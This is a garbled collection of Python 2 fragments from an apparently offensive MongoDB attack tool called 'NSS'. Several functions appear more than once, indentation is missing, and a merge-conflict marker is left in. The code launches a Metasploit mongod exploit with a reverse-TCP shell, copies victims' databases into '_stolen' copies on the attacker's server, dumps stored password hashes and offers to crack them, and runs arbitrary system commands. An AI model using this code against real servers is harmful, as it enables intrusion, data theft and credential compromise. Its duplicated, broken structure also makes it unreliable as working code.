def setParam(self ,param ,value):
'''set plugin par value'''
param = param.upper()
pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW)
code = 'global %s\n'%param
code += '%s="%s"'%(param ,value)
exec(code)
def exploit(self):
'''start exploit !!'''
try:
global exploitModule
exploitModule = exploitModule()
except:
pass
pp.prettyPrint("[*] Start exploit.." ,YELLOW)
plugin.exploit()
def exploit(self):
'''start exploit !!'''
try:
global exploitModule
exploitModule = exploitModule()
except:
pass
pp.prettyPrint("[*] Start exploit.." ,YELLOW)
plugin.exploit()
def do_set(self,arg):
args = arg.split(" ")
if(len(args) == 2):
param = args[0]
value = args[1]
if len(param) and len(value):
res = self.pluginModule.checkParam(param)
if res:
self.pluginModule.setParam(param ,value)
else:
pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW)
else:
pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)
def msfLaunch(self, RHOST, LHOST, LPORT):
try:
proc = subprocess.call(
"msfcli exploit/linux/misc/mongod_native_helper RHOST=" +
str(RHOST) +
" DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" +
str(LHOST) + " LPORT=" + str(LPORT) + " E",
shell=True)
except:
pp.prettyPrint(
"Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined.",
RED)
return
def enumGrid (self,mongoConn):
try:
for dbItem in mongoConn.database_names():
try:
db = mongoConn[dbItem]
fs = gridfs.GridFS(db)
files = fs.list()
pp.prettyPrint("GridFS enabled on database " + str(dbItem),GREEN)
pp.prettyPrint(" list of files:",GREEN)
pp.prettyPrint("\n".join(files),PURPLE)
except:
pp.prettyPrint("GridFS not enabled on " + str(dbItem) + ".",RED)
except:
pp.prettyPrint("[!]Error: Couldn't enumerate GridFS. The provided credentials may not have rights.",RED)
return
def getPlatInfo(self, mongoConn):
pp.prettyPrint("Mongodb Server Basic Info", GREEN)
pp.prettyPrint(
"MongoDB Version: " + mongoConn.server_info()['version'], PURPLE)
pp.prettyPrint(
"Debugs enabled : " + str(mongoConn.server_info()['debug']),
PURPLE)
pp.prettyPrint(
"Platform: " + str(mongoConn.server_info()['bits']) + " bit",
PURPLE)
return
def enumGrid(self, mongoConn):
try:
for dbItem in mongoConn.database_names():
try:
db = mongoConn[dbItem]
fs = gridfs.GridFS(db)
files = fs.list()
pp.prettyPrint("GridFS enabled on database " + str(dbItem),
GREEN)
pp.prettyPrint(" list of files:", GREEN)
pp.prettyPrint("\n".join(files), PURPLE)
except:
pp.prettyPrint(
"GridFS not enabled on " + str(dbItem) + ".", RED)
except:
pp.prettyPrint(
"[!]Error: Couldn't enumerate GridFS. The provided credentials may not have rights.",
RED)
return
def setParam(self ,param ,value):
'''set plugin par value'''
param = param.upper()
if param == 'PAYLOAD':
if value.upper() == "FALSE":
code = 'global PAYLOAD;PAYLOAD="false";'
exec(code)
pp.prettyPrint("[*] Disabled PAYLOAD !" ,YELLOW)
elif self.checkPayload(value) == 'TRUE' and self.getOption("PAYLOAD") != "FALSE":
pp.prettyPrint("[*] SET PAYLOAD=>%s"%value ,YELLOW)
code = 'global PAYLOAD\n'
code += 'PAYLOAD="%s"'%value
exec(code)
else:
pp.prettyPrint("[!] SET PAYLOAD FALSE !" ,RED)
else:
pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW)
code = 'global %s\n'%param
code += '%s="%s"'%(param ,value)
exec(code)
def errmsg(self,msg):
'''show error msg'''
pp.prettyPrint("[!] Err:%s"%msg,RED)
def mainExit(self):
'''exit NSS'''
pp.prettyPrint("\nBye ",RED)
exit(0)
def printLogo(self):
'''print NSS logo..'''
pp.prettyPrint(self.logo,GREY,0)
def exeCMD(self,cmd):
'''run system command'''
pp.prettyPrint('[*] EXEC:%s'%cmd,RED)
system(cmd)
def stealDBs(self,LHOST,LPORT,RHOST,mongoConn):
victim = RHOST
localDbIp = LHOST
localDbPort = int(LPORT)
dbList = mongoConn.database_names()
menuItem = 1
if len(dbList) == 0:
pp.prettyPrint("Can't get a list of databases to steal. The provided credentials may not have rights.",YELLOW)
return
for dbName in dbList:
pp.prettyPrint(str(menuItem) + "-" + dbName,GREEN)
menuItem += 1
try:
dbLoot = raw_input("Select a database to steal:")
except:
pp.prettyPrint("[!]Invalid selection.",RED)
stealDBs(myDB,mongoConn)
try:
#Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
dbNeedCreds = raw_input("Does this database require credentials (y/n)? ")
if dbNeedCreds.lower() == "n":
myDBConn = pymongo.MongoClient(localDbIp,localDbPort)
myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim)
elif dbNeedCreds.lower() == "y":
dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen",victim,dbUser,dbPass)
else:
pp.prettyPrint("[!]Invalid Selection. Press enter to continue.",RED)
stealDBs(myDB,mongoConn)
cloneAnother = raw_input("Database cloned. Copy another (y/n)? ")
if cloneAnother.lower() == "y":
self.stealDBs(myDB,mongoConn)
else:
return
except:
if str(sys.exc_info()).find('text search not enabled') != -1:
pp.prettyPrint("Database copied, but text indexing was not enabled on the target. Indexes not moved.",GREEN)
return
else:
pp.prettyPrint("[!]Something went wrong. Are you sure your MongoDB is running and options are set?",RED)
return
def mainHelp(self):
'''show help'''
pp.prettyPrint('NSS HELP MENU',YELLOW)
pp.prettyPrint('=============',GREY)
pp.prettyPrint(' COMMAND DESCRIPTION',YELLOW)
pp.prettyPrint(' ------- -----------',GREY,0)
pp.prettyPrint('''
help Displays the help menu
exit Exit the NSS
cls Clear the screen
show List the plugins
search Search plugins
use Use the plugin''',CYAN)
pp.prettyPrint('NSS HELP::SHOW',YELLOW)
pp.prettyPrint('==============',GREY)
pp.prettyPrint(' COMMAND DESCRIPTION',YELLOW)
pp.prettyPrint(' ------- -----------',GREY,0)
pp.prettyPrint('''
mongodb List the mongodb plugins
<<<<<<< HEAD
=======
multi List the mongodb plugins
>>>>>>> 6f81fb7bb1cc81ab5062065b198e4e0b4b97e162
all List all the plugins''',CYAN)
def showOptions(self):
'''display plugin options'''
pp.prettyPrint("\n",GREY)
pp.prettyPrint(" PLUGIN OPTS" ,YELLOW)
pp.prettyPrint(" ===========" ,GREY)
pp.prettyPrint(" %-15s %-20s %-40s"%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW)
pp.prettyPrint(" %-15s %-20s %-40s"%("-"*15 ,"-"*20 ,"-"*40) ,GREY)
for opt in plugin.opts:
param = opt[0]
value = opt[1]
desc = opt[2]
pp.prettyPrint(" %-15s"%param ,CYAN ,0)
pp.prettyPrint("%-20s"%value, PURPLE, 0)
pp.prettyPrint("%-20s"%desc , GREEN)
pp.prettyPrint("\n",GREY)
def showUsage(tips):
pp.prettyPrint('[?] USAGE:%s'%tips,YELLOW)
def showOptions(self):
'''display plugin options'''
pp.prettyPrint("PLUGIN OPTS" ,YELLOW)
pp.prettyPrint("===========" ,GREY)
pp.prettyPrint("%-15s %-20s %-40s"%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW)
pp.prettyPrint("%-15s %-20s %-40s"%("-"*15 ,"-"*20 ,"-"*40) ,GREY)
for opt in plugin.opts:
param = opt[0]
value = opt[1]
desc = opt[2]
pp.prettyPrint("%-15s"%param ,CYAN ,0)
exec('pp.prettyPrint("%-20s"%' + "%s"%param + ', PURPLE, 0)')
pp.prettyPrint("%-40s"%desc ,GREEN)
if self.checkPayload(PAYLOAD) == "TRUE":
pp.prettyPrint("PAYLOAD OPTS" ,YELLOW)
pp.prettyPrint("============" ,GREY)
pp.prettyPrint("%-15s %-40s"%("PARAMETER" ,"DESCRIPTION") ,YELLOW)
pp.prettyPrint("%-15s %-40s"%("-"*15 ,"-"*40) ,GREY)
code = open("plugins/payload/" + PAYLOAD + ".py").read()
exec(code)
try:
exec("global NSSPayload")
except:
pass
for opt in NSSPayload.opts:
param = opt[0]
desc = opt[1]
pp.prettyPrint("%-15s"%param ,CYAN ,0)
pp.prettyPrint("%-40s"%desc ,PURPLE)
def enumDbs(self, mongoConn):
try:
pp.prettyPrint("List of databases:", GREEN)
pp.prettyPrint("\n".join(mongoConn.database_names()), PURPLE)
except:
pp.prettyPrint(
"[!]Error: Couldn't list databases. The provided credentials may not have rights.",
RED)
pp.prettyPrint("List of collections:", GREEN)
try:
for dbItem in mongoConn.database_names():
db = mongoConn[dbItem]
pp.prettyPrint(dbItem + ":", CYAN)
pp.prettyPrint("\n".join(db.collection_names()), PURPLE)
if 'system.users' in db.collection_names():
users = list(db.system.users.find())
pp.prettyPrint("Database Users and Password Hashes:",
GREEN)
for x in range(0, len(users)):
pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'], GREEN)
pp.prettyPrint("\n", GREEN)
crack = raw_input("Crack this hash (y/n)? ")
if crack.lower() == "y":
self.passCrack(users[x]['user'], users[x]['pwd'])
except:
pp.prettyPrint(
"[!]Error: Couldn't list collections. The provided credentials may not have rights.",
RED)
return
def info(self):
'''display plugin infos'''
pp.prettyPrint("PLUGIN INFOS" ,YELLOW)
pp.prettyPrint("============" ,GREY)
pp.prettyPrint("PARAMETER VALUE" ,YELLOW)
pp.prettyPrint("-"*15 + " " + "-"*20 ,GREY)
for info in plugin.infos:
param = info[0]
value = info[1]
pp.prettyPrint("%-15s"%param ,CYAN ,0)
pp.prettyPrint("%-s"%value ,PURPLE)
def pluginHelp(self):
'''plugin help menu'''
pp.prettyPrint('PLUGIN HELP MENU' ,YELLOW)
pp.prettyPrint('================' ,GREY)
pp.prettyPrint(' Command Description' ,YELLOW)
pp.prettyPrint(' ------- -----------' ,GREY ,0)
pp.prettyPrint('''
help Displays the plugin menu
exit Back to NSS Main
cls Clear the screen
info Displays the plugin info
show Displays the plugin options
set Configure the plugin parameters
exploit Start plugin to exploit''' ,CYAN)
pp.prettyPrint('PLUGIN SET HELP' ,YELLOW)
pp.prettyPrint('===============' ,GREY)
pp.prettyPrint(' Command Description' ,YELLOW)
pp.prettyPrint(' ------- -----------' ,GREY,0)
pp.prettyPrint('''
PAYLOAD Set payload
<PARAMETER> Set parameter''' ,CYAN)
def loadError(self,flag):
if flag:
pp.prettyPrint("[!] NO THIS PLUGIN !",RED)
else:
pp.prettyPrint("[!] IT'S A PAYLOAD !",RED)
def start(self):
pp.prettyPrint("[*] Start NSS ..",GREEN)
def stealDBs(self, LHOST, LPORT, RHOST, mongoConn):
victim = RHOST
localDbIp = LHOST
localDbPort = int(LPORT)
dbList = mongoConn.database_names()
menuItem = 1
if len(dbList) == 0:
pp.prettyPrint(
"Can't get a list of databases to steal. The provided credentials may not have rights.",
YELLOW)
return
for dbName in dbList:
pp.prettyPrint(str(menuItem) + "-" + dbName, GREEN)
menuItem += 1
try:
dbLoot = raw_input("Select a database to steal:")
except:
pp.prettyPrint("[!]Invalid selection.", RED)
stealDBs(myDB, mongoConn)
try:
#Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
dbNeedCreds = raw_input(
"Does this database require credentials (y/n)? ")
if dbNeedCreds.lower() == "n":
myDBConn = pymongo.MongoClient(localDbIp, localDbPort)
myDBConn.copy_database(dbList[int(dbLoot) - 1],
dbList[int(dbLoot) - 1] + "_stolen",
victim)
elif dbNeedCreds.lower() == "y":
dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen",
victim, dbUser, dbPass)
else:
pp.prettyPrint(
"[!]Invalid Selection. Press enter to continue.", RED)
stealDBs(myDB, mongoConn)
cloneAnother = raw_input("Database cloned. Copy another (y/n)? ")
if cloneAnother.lower() == "y":
self.stealDBs(myDB, mongoConn)
else:
return
except:
if str(sys.exc_info()).find('text search not enabled') != -1:
pp.prettyPrint(
"Database copied, but text indexing was not enabled on the target. Indexes not moved.",
GREEN)
return
else:
pp.prettyPrint(
"[!]Something went wrong. Are you sure your MongoDB is running and options are set?",
RED)
return
def mainHelp(self):
'''show help'''
pp.prettyPrint("\n",GREY)
pp.prettyPrint(' NSS HELP MENU',YELLOW)
pp.prettyPrint(' =============',GREY)
pp.prettyPrint(' COMMAND DESCRIPTION',YELLOW)
pp.prettyPrint(' ------- -----------',GREY,0)
pp.prettyPrint('''
help Displays the help menu
show List the plugins
search Search plugins
use Use the plugin
banner Show the banner
cls Clear the screen
exit Exit the NSS''',CYAN)
pp.prettyPrint("\n",GREY)
def enumDbs (self,mongoConn):
try:
pp.prettyPrint("List of databases:",GREEN)
pp.prettyPrint("\n".join(mongoConn.database_names()),PURPLE)
except:
pp.prettyPrint("[!]Error: Couldn't list databases. The provided credentials may not have rights.",RED)
pp.prettyPrint("List of collections:",GREEN)
try:
for dbItem in mongoConn.database_names():
db = mongoConn[dbItem]
pp.prettyPrint(dbItem + ":",CYAN)
pp.prettyPrint("\n".join(db.collection_names()),PURPLE)
if 'system.users' in db.collection_names():
users = list(db.system.users.find())
pp.prettyPrint("Database Users and Password Hashes:",GREEN)
for x in range (0,len(users)):
pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'],GREEN)
pp.prettyPrint("\n",GREEN)
crack = raw_input("Crack this hash (y/n)? ")
if crack.lower() == "y":
self.passCrack(users[x]['user'],users[x]['pwd'])
except:
pp.prettyPrint("[!]Error: Couldn't list collections. The provided credentials may not have rights.",RED)
return
def loadError(self):
pp.prettyPrint("[!] NO THIS PLUGIN !",RED)
def msfLaunch(self,RHOST,LHOST,LPORT):
try:
proc = subprocess.call("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str(RHOST) +" DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str(LHOST) + " LPORT="+ str(LPORT) + " E", shell=True)
except:
pp.prettyPrint("Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined.",RED)
return
def pluginHelp(self):
'''plugin help menu'''
pp.prettyPrint("\n",GREY)
pp.prettyPrint(' PLUGIN HELP MENU' ,YELLOW)
pp.prettyPrint(' ================' ,GREY)
pp.prettyPrint(' Command Description' ,YELLOW)
pp.prettyPrint(' ------- -----------' ,GREY ,0)
pp.prettyPrint('''
help Displays the plugin menu
info Displays the plugin info
show Displays the plugin options
set Configure the plugin parameters
exploit Exploit the target
cls Clear the screen
back Back to NSS Main''' ,CYAN)
pp.prettyPrint(' PLUGIN SET HELP' ,YELLOW)
pp.prettyPrint(' ===============' ,GREY)
pp.prettyPrint(' Command Description' ,YELLOW)
pp.prettyPrint(' ------- -----------' ,GREY,0)
pp.prettyPrint('''
<PARAMETER> Set parameter''' ,CYAN)
pp.prettyPrint("\n",GREY)
def getPlatInfo(self,mongoConn):
pp.prettyPrint("Mongodb Server Basic Info",GREEN)
pp.prettyPrint("MongoDB Version: " + mongoConn.server_info()['version'],PURPLE)
pp.prettyPrint("Debugs enabled : " + str(mongoConn.server_info()['debug']),PURPLE)
pp.prettyPrint("Platform: " + str(mongoConn.server_info()['bits']) + " bit",PURPLE)
return
if len(param) and len(value):
res = self.pluginModule.checkParam(param)
if res:
self.pluginModule.setParam(param ,value)
else:
pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW)
else:
pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)
def complete_set(self,text,line,begidx,endidx):
USE_ARG = self.pluginModule.getOptions()
if not text:
completions = USE_ARG[:]
else:
completions = [i for i in USE_ARG if i.startswith(text.upper())]
return completions
def do_EOF(self):
return True
do_back = do_exit
if __name__ == '__main__':
try:
loads = loadPlugin(arg)
loads.cmdloop()
except KeyboardInterrupt:
pp.prettyPrint("\n[!] CTRL+C EXIT !",RED)
except Exception,e:
pp.prettyPrint("[!] ERR:%s"%e,RED)
def info(self):
'''display plugin infos'''
pp.prettyPrint("\n",GREY)
pp.prettyPrint(" PLUGIN INFOS" ,YELLOW)
pp.prettyPrint(" ============" ,GREY)
pp.prettyPrint(" PARAMETER VALUE" ,YELLOW)
pp.prettyPrint(" "+"-"*15 + " " + "-"*20 ,GREY)
for info in plugin.infos:
param = info[0]
value = info[1]
pp.prettyPrint(" %-15s"%param ,CYAN ,0)
pp.prettyPrint("%-s"%value ,PURPLE)
pp.prettyPrint("\n",GREY)